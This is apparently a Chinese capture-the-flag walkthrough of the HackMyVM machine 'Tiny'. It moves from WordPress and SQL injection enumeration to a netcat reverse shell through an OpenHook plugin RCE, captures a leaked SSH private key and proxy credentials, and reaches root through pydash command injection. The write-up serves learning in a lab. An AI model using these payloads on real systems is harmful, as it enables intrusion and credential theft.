Tiny
信息搜集
端口扫描
rustscan -a 172.20.10.3 -- -APORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW/HgWpBe3FlvvdyW1IsS+o1NK/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=
| 256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt
80/tcp open http syn-ack Apache httpd 2.4.57 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.57 (Debian)
| http-robots.txt: 15 disallowed entries
| /wp-admin/ /cgi-bin/ /private/ /temp/ /backup/ /old/
| /test/ /dev/ / /misc/ /downloads/ /doc/ /documents/
|_/restricted/ /confidential/
|_http-title: Blog
|_http-generator: WordPress 6.3.1
8888/tcp open http-proxy syn-ack tinyproxy 1.11.1
|_http-server-header: tinyproxy/1.11.1
|_http-title: 403 Access denied
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel目录扫描
gobuster dir -u http://172.20.10.3 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png/.php (Status: 403) [Size: 276]
/index.php (Status: 301) [Size: 0] [--> http://172.20.10.3/]
/wp-content (Status: 301) [Size: 315] [--> http://172.20.10.3/wp-content/]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 316] [--> http://172.20.10.3/wp-includes/]
/javascript (Status: 301) [Size: 315] [--> http://172.20.10.3/javascript/]
/robots.txt (Status: 200) [Size: 815]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-login.php (Status: 200) [Size: 5714]
/wp-admin (Status: 301) [Size: 313] [--> http://172.20.10.3/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/.php (Status: 403) [Size: 276]
/wp-signup.php (Status: 302) [Size: 0] [--> http://tiny.hmv/wp-login.php?action=register]
/server-status (Status: 403) [Size: 276]漏洞扫描
nikto -h http://172.20.10.3 Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 172.20.10.3
+ Target Hostname: 172.20.10.3
+ Target Port: 80
+ Start Time: 2024-04-09 02:42:54 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.57 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal Link header found with value: <http://tiny.hmv/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index.php?: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: contains 18 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ : CGI Directory found. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1607
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /: A WordPress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: WordPress uploads directory is browsable. This may reveal sensitive information.
+ /wp-login.php: WordPress login found.
+ 9732 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2024-04-09 02:43:22 (GMT-4) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testedWPScan扫描
wpscan --url http://tiny.hmv/ --api-token=xxxxxx_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://tiny.hmv/ [172.20.10.3]
[+] Started: Tue Apr 9 03:49:34 2024
Interesting Finding(s):
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=============================================================================> (137 / 137) 100.00% Time: 00:00:0
[i] No Config Backups Found.似乎没啥发现。。
漏洞利用
踩点
这个wordpress版本似乎比较新,先不进行漏洞探测了,再看一下8080端口,无法访问。
查看敏感目录
暂时没啥大用。。
# robots.txt for http://tiny.hmv
# General settings
User-agent: *
Crawl-delay: 10
# Standard subdirectory disallow
Disallow: /wp-admin/
Disallow: /cgi-bin/
Disallow: /private/
Disallow: /temp/
Disallow: /backup/
# Specific rules for known bots
User-agent: Googlebot
Allow: /
User-agent: Bingbot
Allow: /
Disallow: /private/
# Additional sitemap references
Sitemap: http://tiny.hmv/sitemap.xml
Sitemap: http://wish.tiny.hmv/sitemap.xml
# Restrictions for other directories
Disallow: /old/
Disallow: /test/
Disallow: /dev/
# Restrict access for BadBot
User-agent: BadBot
Disallow: /
# Miscellaneous
Disallow: /misc/
Disallow: /downloads/
Disallow: /doc/
Disallow: /documents/
# For any other miscellaneous user-agents, apply general restrictions
User-agent: *
Disallow: /restricted/
Disallow: /confidential/挨个看一下,发现会跳转,做一个dns解析
172.20.10.3 tiny.hmv wish.tiny.hmv发现登录页面admin.php:
主页:
还有一个登录框:
为什么这里使用kali,因为我不知道咋配置windows,我的电脑配置了这个域名以后还是会502。
SQL注入
其他的暂时进不去。联想到它的域名有东西,尝试FUZZ一下,这个时间抓一下包,顺便测试一下弱密码和万能密码:
POST /index.php HTTP/1.1
Host: wish.tiny.hmv
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wish.tiny.hmv
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://wish.tiny.hmv/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
username=admin&wish=123456
HTTP 状态代码500 表示服务器内部错误。 这通常是由于服务器端的代码执行出错导致的。 当客户端(例如浏览器)向服务器发起请求时,服务器会返回一个HTTP 状态代码来告诉客户端请求的处理情况。 如果服务器返回500 错误,则表示在处理请求时发生了未知错误。
尝试注入一下:
ghauri -r sql.txt --batch
# sqlmap -r sql.txt换一个工具用用,其实两个工具都是一样的。
查看数据:
ghauri -r sql.txt --batch --current-db
ghauri -r sql.txt -p username -D wish_db --tables
ghauri -r sql.txt -p username -D wish_db -T wishs --dump
ghauri -r sql.txt -p username -D wish_db -T wishs -C wish --dump
ghauri -r sql.txt -p username -D wish_db -T admin --columns
ghauri -r sql.txt -p username -D wish_db -T admin -C username --dump
ghauri -r sql.txt -p username -D wish_db -T admin -C password --dump得到:
umeko
8df4387dd1598d4dcf237f9443028cec尝试解密一下:
尝试登录:
umeko
fuckit!
进来了。
FUZZ域名
FUZZ的结果:
wfuzz -u http://FUZZ.tiny.hmv -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --ip 172.20.10.3 --hw 901
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 301 0 L 0 W 0 Ch "www"
000006244: 200 68 L 132 W 1821 Ch "wish"
000009532: 400 10 L 35 W 300 Ch "#www"
000010581: 400 10 L 35 W 300 Ch "#mail"
# ffuf -u http://FUZZ.tiny.hmv/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
# wish [Status: 200, Size: 1821, Words: 576, Lines: 69, Duration: 16ms]没东西,接着做吧。
插入代码反弹shell
我们想插入php代码反弹shell,但是似乎没有相应的地方给我门进行操作,尝试查找该版本的相关漏洞了,到了这里应该是想让我们使用相关漏洞的:
尽管漏洞很多,但是都不是我们想要的,我们尝试一下google!
我们需要的是可以RCE的漏洞,直接搜索一下,在google和github看看:
一无所获,不是本身的问题,那就是插件的问题了,尝试查看一下插件相关信息,使用wpscan进行查找:
存在相关的参数,尝试进行搜集:
wpscan --url http://tiny.hmv/ -e ap --plugins-detection aggressive --plugins-version-detection aggressive --api-token=xxxxxx- mix 混合
- passive 被动
- aggressive 主动
懂吧,肯定要主动一点啊,不然找不到女朋友,狗头.jpg。
[i] Plugin(s) Identified:
[+] akismet
| Location: http://tiny.hmv/wp-content/plugins/akismet/
| Last Updated: 2024-03-21T00:55:00.000Z
| Readme: http://tiny.hmv/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.2
|
| Found By: Known Locations (Aggressive Detection)
| - http://tiny.hmv/wp-content/plugins/akismet/, status: 200
|
| Version: 5.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://tiny.hmv/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://tiny.hmv/wp-content/plugins/akismet/readme.txt
[+] guardgiant
| Location: http://tiny.hmv/wp-content/plugins/guardgiant/
| Last Updated: 2023-12-08T15:55:00.000Z
| Readme: http://tiny.hmv/wp-content/plugins/guardgiant/README.txt
| [!] The version is out of date, the latest version is 2.2.6
|
| Found By: Known Locations (Aggressive Detection)
| - http://tiny.hmv/wp-content/plugins/guardgiant/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: WordPress Brute Force Protection < 2.2.6 - Admin+ SQLi
| Fixed in: 2.2.6
| References:
| - https://wpscan.com/vulnerability/1fc067f1-0b58-404d-bb18-d7f2ce0363fd
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48764
| - https://patchstack.com/database/vulnerability/guardgiant/wordpress-wordpress-brute-force-protection-stop-brute-force-attacks-plugin-2-2-5-sql-injection-vulnerability
|
| Version: 2.2.5 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://tiny.hmv/wp-content/plugins/guardgiant/README.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://tiny.hmv/wp-content/plugins/guardgiant/README.txt
[+] thesis-openhook
| Location: http://tiny.hmv/wp-content/plugins/thesis-openhook/
| Last Updated: 2023-09-29T03:04:00.000Z
| Readme: http://tiny.hmv/wp-content/plugins/thesis-openhook/readme.txt
| [!] The version is out of date, the latest version is 4.3.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://tiny.hmv/wp-content/plugins/thesis-openhook/, status: 403
|
| [!] 1 vulnerability identified:
|
| [!] Title: OpenHook < 4.3.1 - Subscriber+ Remote Code Execution
| Fixed in: 4.3.1
| References:
| - https://wpscan.com/vulnerability/5bd9fbd2-26ea-404a-aba7-f0c457a082b6
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5201
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/37b9ed0e-5af2-47c1-b2da-8d103e4c31bf
|
| Version: 4.3.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://tiny.hmv/wp-content/plugins/thesis-openhook/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://tiny.hmv/wp-content/plugins/thesis-openhook/readme.txt发现了一个远程代码执行漏洞,尝试利用:
The OpenHook plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 4.3.0 via the 'php' shortcode. This allows authenticated attackers with subscriber-level permissions or above, to execute code on the server. This requires the [php] shortcode setting to be enabled on the vulnerable site.
WordPress 的 OpenHook 插件在 4.3.0 及之前的版本中容易通过“php”短代码受到远程代码执行的攻击。这允许具有订阅者级或更高权限的经过身份验证的攻击者在服务器上执行代码。这需要在易受攻击的网站上启用 [php] 短代码设置。
尝试进行利用,先看一下这个php短代码是啥,在网上发现是长这样的:
尝试一下是否可以执行:
改为[php]又可以执行了,嘶,看来不能随便作妖。。。
对了,我中间把所有者改为admin了,但是好像没啥关系。
尝试反弹shell!!!!
# payload
[php]
<?php system('nc -e /bin/bash 172.20.10.8 1234') ?>
[/php]
它在上传,但是其实已经弹回来了,nuo:
提权
提升交互性
/usr/bin/script -qc /bin/bash /dev/null
export TERM=xterm
python3 -c 'import pty;pty.spawn("/bin/bash")'都行。
信息搜集
(remote) www-data@tiny.hmv:/var/www/html$ ls
index.nginx-debian.html readme.html wp-admin wp-config-sample.php wp-cron.php wp-load.php wp-settings.php xmlrpc.php
index.php robots.txt wp-blog-header.php wp-config.php wp-includes wp-login.php wp-signup.php
license.txt wp-activate.php wp-comments-post.php wp-content wp-links-opml.php wp-mail.php wp-trackback.php
(remote) www-data@tiny.hmv:/var/www/html$ cat wp-config.php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpressdb' );
/** Database username */
define( 'DB_USER', 'wordpressuser' );
/** Database password */
define( 'DB_PASSWORD', '6rt443RKhwTXjWDe' );wordpressuser
6rt443RKhwTXjWDe继续搜集:
(remote) www-data@tiny.hmv:/home$ ls
vic
(remote) www-data@tiny.hmv:/home$ cd vic
bash: cd: vic: Permission denied
(remote) www-data@tiny.hmv:/home$ ps aux
.........
tinypro+ 551 0.0 0.1 203964 3508 ? Ss 08:23 0:00 /usr/bin/tinyproxy -d
.........
(remote) www-data@tiny.hmv:/home$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:8000 0.0.0.0:*
tcp LISTEN 0 1024 0.0.0.0:8888 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 1024 [::]:8888 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 *:80 *:* Tinyproxy是一个面向POSIX系统开发的轻量级的开源HTTP/HTTPS代理守护进程。它的设计目标是快而小,从底层开始设计,保证了在高速的同时体积依然很小,仅需少量系统资源。它很适合用于需要完整HTTP代理特性,但系统资源又不足以运行大型代理的场景,比如嵌入式部署和小规模网络。
Tinyproxy具有以下特性:
- 高速缓冲:Tinyproxy具有缓冲连接的理念,可以对服务器的响应进行高速缓冲,然后按照客户端能够处理的最高速度进行响应,极大地降低了网络延滞带来的问题。
- 共享Internet连接:如果你有一个有线或无线网络,并希望与其他人共享你的Internet连接,Tinyproxy可以帮助你实现这一点。
- 网络监控和控制:Tinyproxy通过设置过滤规则,可以帮助你控制网络流量,并限制用户的某些访问权限。
- 私有云服务支持:如果你想在本地运行私有云服务(如OpenStack),并且想通过互联网访问它们,Tinyproxy同样可以提供支持。
端口转发接收私钥
查看一下:
我们接着查找一下这个默认的配置文件:
(remote) www-data@tiny.hmv:/home$ find / -name tinyproxy -type f 2>/dev/null
/usr/bin/tinyproxy
/etc/init.d/tinyproxy
/etc/default/tinyproxy
/etc/logrotate.d/tinyproxy
(remote) www-data@tiny.hmv:/home$ find / -name tinyproxy.conf 2>/dev/null
/usr/share/doc/tinyproxy/examples/tinyproxy.conf
/usr/lib/tmpfiles.d/tinyproxy.conf
/etc/tinyproxy/tinyproxy.conf查找一下我们想要的东西:
cat /usr/lib/tmpfiles.d/tinyproxy.conf
cat /etc/tinyproxy/tinyproxy.conf
cat /etc/tinyproxy/tinyproxy.conf | grep "Port"
cat /etc/tinyproxy/tinyproxy.conf | grep -v "#"
cat /etc/tinyproxy/tinyproxy.conf | grep -v "#" | grep
grep .的意思是搜索包含至少一个字符的行。由于.匹配任何字符,所以任何非空行都会被这个命令匹配。
User tinyproxy
Group tinyproxy
Port 8888
Timeout 600
DefaultErrorFile "/usr/share/tinyproxy/default.html"
StatFile "/usr/share/tinyproxy/stats.html"
LogFile "/var/log/tinyproxy/tinyproxy.log"
LogLevel Info
PidFile "/run/tinyproxy/tinyproxy.pid"
Upstream http localhost:1111
MaxClients 100
Allow 127.0.0.1
Allow ::1
Allow 192.168.0.30
ViaProxyName "tinyproxy"
看来8888端口被绑定到了1111端口,尝试监听一下:
(remote) www-data@tiny.hmv:/home$ nc -lp 1111
whoami
^C
(remote) www-data@tiny.hmv:/home$ nc -lvvp 1111
listening on [any] 1111 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 34160
GET http://127.0.0.1:8000/id_rsa HTTP/1.1
Host: 127.0.0.1:8000
Connection: close
Via: 1.1 tinyproxy (tinyproxy/1.11.1)
Authorization: Basic cm9vdDpRMlg0OXQ0V2pz
User-Agent: curl/7.88.1
Accept: */*果然是定时任务。。。发现传过来的是id_rsa,端口转发一下,然后接收:
(remote) www-data@tiny.hmv:/tmp$ socat -V
socat by Gerhard Rieger and contributors - see www.dest-unreach.org
socat version 1.7.4.4 on 06 Nov 2022 08:15:51
running on Linux version #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03), release 6.1.0-10-amd64, machine x86_64
features:
#define WITH_STDIO 1
#define WITH_FDNUM 1
#define WITH_FILE 1
#define WITH_CREAT 1
#define WITH_GOPEN 1
#define WITH_TERMIOS 1
#define WITH_PIPE 1
#define WITH_UNIX 1
#define WITH_ABSTRACT_UNIXSOCKET 1
#define WITH_IP4 1
#define WITH_IP6 1
#define WITH_RAWIP 1
#define WITH_GENERICSOCKET 1
#define WITH_INTERFACE 1
#define WITH_TCP 1
#define WITH_UDP 1
#define WITH_SCTP 1
#define WITH_LISTEN 1
#define WITH_SOCKS4 1
#define WITH_SOCKS4A 1
#define WITH_VSOCK 1
#define WITH_PROXY 1
#define WITH_SYSTEM 1
#define WITH_EXEC 1
#undef WITH_READLINE
#define WITH_TUN 1
#define WITH_PTY 1
#define WITH_OPENSSL 1
#undef WITH_FIPS
#define WITH_LIBWRAP 1
#define WITH_SYCLS 1
#define WITH_FILAN 1
#define WITH_RETRY 1
#define WITH_MSGLEVEL 0 /*debug*/
(remote) www-data@tiny.hmv:/tmp$ socat -v TCP-LISTEN:1111,reuseaddr,fork TCP:127.0.0.1:8000
> 2024/04/09 11:08:02.000033517 length=206 from=0 to=205
GET http://127.0.0.1:8000/id_rsa HTTP/1.1\r
Host: 127.0.0.1:8000\r
Connection: close\r
Via: 1.1 tinyproxy (tinyproxy/1.11.1)\r
Authorization: Basic cm9vdDpRMlg0OXQ0V2pz\r
User-Agent: curl/7.88.1\r
Accept: */*\r
\r
< 2024/04/09 11:08:02.000084086 length=2851 from=0 to=2850
HTTP/1.1 200 OK\r
Server: nginx/1.22.1\r
Date: Tue, 09 Apr 2024 09:08:02 GMT\r
Content-Type: application/octet-stream\r
Content-Length: 2602\r
Last-Modified: Sat, 30 Sep 2023 06:17:50 GMT\r
Connection: close\r
ETag: "6517bd8e-a2a"\r
Accept-Ranges: bytes\r
\r
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAr/yECvux95Vg435Ui0yuaBZTS/WUvQqlf7bYXEfYyL/8xCZFmBzE
4cMvIOcS3h0O766SRGu0hYZRkNZifQRBs8+vEFuc1lGxm1JsJpCqJ1aI61ieL/6n9xv2ci
O+nz7ONmcitb/Xpg4k95w/pRQRY6kDwfSUFhUY7roVbZLzPTjtb+z4BCWEp6nokFmOBw20
oL3h/lKK8yHE2nSQVLc47wnNyM97TJT0lac4gTkm5lqGNrDhbmo1e5OeDKjezkmXGTqNo4
RAp0bl6ZHQ6A43nm5YBr/btdPZq2huSifVdgaXu3joLuMbzanihyEq1gaSrf0BaFDKjf0g
vyiNfTd5lc+W+/SnystQuddu5hR9i8H75VBONhpOeShU3mFVpCZ7BErltTtEU73jzxbZKg
/pLw/PZFJvw0SOQN3oTuVwXioxF1dD8fM4sXqu9AoXAQnrQ3wZW7tdfFHGHCC53nxtQnHJ
oB/KV3AXKanDZ+lXAoPTNwPpAGPlTo6oR9mNtxYPAAAFiC4qngkuKp4JAAAAB3NzaC1yc2
EAAAGBAK/8hAr7sfeVYON+VItMrmgWU0v1lL0KpX+22FxH2Mi//MQmRZgcxOHDLyDnEt4d
Du+ukkRrtIWGUZDWYn0EQbPPrxBbnNZRsZtSbCaQqidWiOtYni/+p/cb9nIjvp8+zjZnIr
W/16YOJPecP6UUEWOpA8H0lBYVGO66FW2S8z047W/s+AQlhKep6JBZjgcNtKC94f5SivMh
xNp0kFS3OO8JzcjPe0yU9JWnOIE5JuZahjaw4W5qNXuTngyo3s5Jlxk6jaOEQKdG5emR0O
gON55uWAa/27XT2atobkon1XYGl7t46C7jG82p4ochKtYGkq39AWhQyo39IL8ojX03eZXP
lvv0p8rLULnXbuYUfYvB++VQTjYaTnkoVN5hVaQmewRK5bU7RFO9488W2SoP6S8Pz2RSb8
NEjkDd6E7lcF4qMRdXQ/HzOLF6rvQKFwEJ60N8GVu7XXxRxhwgud58bUJxyaAfyldwFymp
w2fpVwKD0zcD6QBj5U6OqEfZjbcWDwAAAAMBAAEAAAGASO7FaifVIV3uwVjhgLlOriRScP
Bdq9p1q/ACynucA9ZM0p1pyhhiH43cQi6BSzuPrRUT2Pcp4QxBUV0Hg/f3oqU3T/gnj0pb
6JrH51OcsKDULXSUWh+XTHlyMOtPXH+SxkkHwXq3zEGgYF2IoskmS78Hp6HMnToxEv5bUw
XLeFvXSsNSJaXGzBVGJEx458NuUA9hURy0KP6drksQZYtpNOdDOS2DU8GHe13JtQQScvSh
GplDU5cAgy4yGd0COUuVeha7kxu8X3H1DilAjkqA/WTXsrl4hFSBmFqAHus6lAIVwqXta8
a5AczCy2sj96Am8i82OEqWm/s9qDGsXShNN9OXdzV1AjGPTU6tfD44mMKjFTg/T8AAgrnF
Ny8G8cEZ25/+p4VOB1D5Md/cHNXV4IJbQQjMhdWPKQAjbgmxV5O8b0Juvm+DjL6eki7btb
pNmxNY/bC1NU99aizPt4wMR4AavsPnSdSEyHyGPiMM6KpNt0zQKndRYqqxlL8RlWJBAAAA
wDziFYIuXmtoCnsTD3lpXEOuIUmuVb9rvdeXlM/4W2x5AE0DulPINGaGZRai8IDNfDcdeW
1Y2CIFtrAZnsxmQWN/8XSwd9WJkRgXkapjJlRqR3HVQGwpkm85GRhPchbdMh7W3Nq/ZQPP
b669wTQI2gsxQcgW9OOj+OzZu36c/zj2S7NyVJKE58fg7isCOoKAdAFmi3HPkdGM/w/FJV
fC1JSzvu34RyOY1lZy0v4TKu4F+2G1xp7Z+cOQMEUM5hNx+gAAAMEA7D3vajOb/mwu5+oE
zjggNbzN6waU/DmbmoaMqBM4qxyMNU2oNCTrtvrrkG0BEHoslnSJo9/Cr8MP6joOMk6eTg
z64vBmTlvY5defCN/8TX1lxZyk1qOM5DliTK56ydRepXMFRgTJUf1xoorZ2vKZNHmPGLvr
SvBMKcghKOgGyt/ydnxLCttwl4Gqxb6SA57tej5eezsvw/nH+k5rkxOUqyw2mDALzk2IWz
1PxwaZ/Zq0w3A9jRSKVyfPPOwnjuD7AAAAwQC+tHo9BC/6YgZBihmL0eAjV2Hr5+vh+OUx
azB+TpW2NZWLyiCrmqCDNllKRaAOWdDEmtzj4LdGCsV4Q+Ndt4TwvDT+IERHg7zo586N/r
IKNT4z9FD/jiEYHdmZ4LgCIlhseV9ryELv9y9p6qZJcNXp65L7i4gG5n8uiuphNb7r/my/
ewAiJsS+Vc8DQ1H5ECwcBt9JrLczvMiUMJ6inh8Ppvn4MIkYSxA6xLAAtpkEFq3IAbDPnE
67apP6Gxw32v0AAAAMdmljQHRpbnkuaG12AQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----尝试ssh连接一下:
提权至root
信息搜集
╭─vic@tiny ~
╰─$ pwd
/home/vic
╭─vic@tiny ~
╰─$ ls -la
total 220
drwx------ 6 vic vic 4096 Apr 9 11:12 .
drwxr-xr-x 3 root root 4096 Sep 25 2023 ..
-rw-r--r-- 1 vic vic 220 Sep 30 2023 .bash_logout
-rw-r--r-- 1 vic vic 3526 Sep 30 2023 .bashrc
drwx------ 3 vic vic 4096 Sep 30 2023 .gnupg
drwxr-xr-x 3 vic vic 4096 Sep 30 2023 .local
drwxr-xr-x 12 vic vic 4096 Sep 30 2023 .oh-my-zsh
-rw-r--r-- 1 vic vic 807 Sep 30 2023 .profile
drwx------ 2 vic vic 4096 Sep 30 2023 .ssh
-rwx------ 1 vic vic 33 Sep 30 2023 user.txt
-rw-r--r-- 1 vic vic 51858 Apr 9 11:11 .zcompdump-tiny-5.9
-r--r--r-- 1 vic vic 120064 Apr 9 11:11 .zcompdump-tiny-5.9.zwc
-rw------- 1 vic vic 66 Apr 9 11:12 .zsh_history
-rw-r--r-- 1 vic vic 3890 Sep 30 2023 .zshrc
╭─vic@tiny ~
╰─$ cat user.txt
7d9b0f6638734dbb10545f446c04a42b
╭─vic@tiny ~
╰─$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
╭─vic@tiny ~
╰─$ sudo -l 1 ↵
Matching Defaults entries for vic on tiny:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User vic may run the following commands on tiny:
(ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/car.py*
╭─vic@tiny ~
╰─$ cat /opt/car.py
import sys
import random
import pydash
class Car:
def __init__(self, model, year):
self.model = model
self.year = year
self.id = random.randint(1, 99999)
def get_info(self, info_type):
if info_type == "model":
return self.model
elif info_type == "year":
return self.year
elif info_type == "id":
return self.id
def poc(path, arg):
obj = Car('Sedan', 2011)
res = pydash.objects.invoke(obj, path, arg)
print(res)
if __name__ == '__main__':
if len(sys.argv) < 3:
print('Missing args: %s <path> <arg>' % sys.argv[0])
sys.exit(1)
poc(sys.argv[1], sys.argv[2])就是一个普通的脚本,第一反应看是不是import的文件可以修改,查看一下:
find / -writable -type f 2>/dev/null但是没有看到可以修改的库文件,代码审计一下,这个脚本里没啥东西容易出错,如果非要出错的话,可能就是在pydash.objects.invoke,主要看这个invoke不顺眼,前一阵子看hvv的时候看到了Jboss的反序列化漏洞,里面就有个invoke/readonly好像有问题,搜索一下,这题肯定不是pwn搞的,都没有执行系统函数。
存在命令劫持的漏洞,看一下是啥情况:
This affects versions of the package pydash before 6.0.0. A number of pydash methods such as pydash.objects.invoke() and pydash.collections.invoke_map() accept dotted paths (Deep Path Strings) to target a nested Python object, relative to the original source object. These paths can be used to target internal class attributes and dict items, to retrieve, modify or invoke nested Python objects.
Note:
The pydash.objects.invoke() method is vulnerable to Command Injection when the following prerequisites are satisfied:
- The source object (argument 1) is not a built-in object such as list/dict (otherwise, the init.globals path is not accessible)
- The attacker has control over argument 2 (the path string) and argument 3 (the argument to pass to the invoked method)
The pydash.collections.invoke_map() method is also vulnerable, but is harder to exploit as the attacker does not have direct control over the argument to be passed to the invoked function.
这会影响 6.0.0 之前的 pydash 包版本。许多 pydash 方法(例如 pydash.objects.invoke() 和 pydash.collections.invoke_map())接受点路径(深层路径字符串)来定位相对于原始源对象的嵌套 Python 对象。这些路径可用于定位内部类属性和字典项,以检索、修改或调用嵌套的 Python 对象。
笔记:
当满足以下先决条件时, pydash.objects.invoke() 方法容易受到命令注入的攻击:
- 源对象(参数1)不是list /dict等内置对象(否则,init.globals路径不可访问)
- 攻击者可以控制参数 2(路径字符串)和参数 3(传递给调用方法的参数)
pydash.collections.invoke_map() 方法也容易受到攻击,但更难利用,因为攻击者无法直接控制要传递给调用函数的参数。
看一下包的版本:
╭─vic@tiny ~
╰─$ pip show pydash
Name: pydash
Version: 5.1.2
Summary: The kitchen sink of Python utility libraries for doing "stuff" in a functional way. Based on the Lo-Dash Javascript library.
Home-page: https://github.com/dgilland/pydash
Author: Derrick Gilland
Author-email: dgilland@gmail.com
License: MIT License
Location: /usr/local/lib/python3.11/dist-packages
Requires:
Required-by: 是我们可以攻击的版本,尝试构造一下代码进行利用!!!!!
先尝试一下提供的POC:
╭─vic@tiny ~
╰─$ sudo /usr/bin/python3 /opt/car.py __init__.__globals__.random._os.system "id"
uid=0(root) gid=0(root) groups=0(root)
0牛蛙,尝试提权!
╭─vic@tiny ~
╰─$ sudo /usr/bin/python3 /opt/car.py __init__.__globals__.random._os.system "chmod +s /bin/bash"
0
╭─vic@tiny ~
╰─$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23 2023 /bin/bash
╭─vic@tiny ~
╰─$ /bin/bash -p
bash-5.2# whoami;id
root
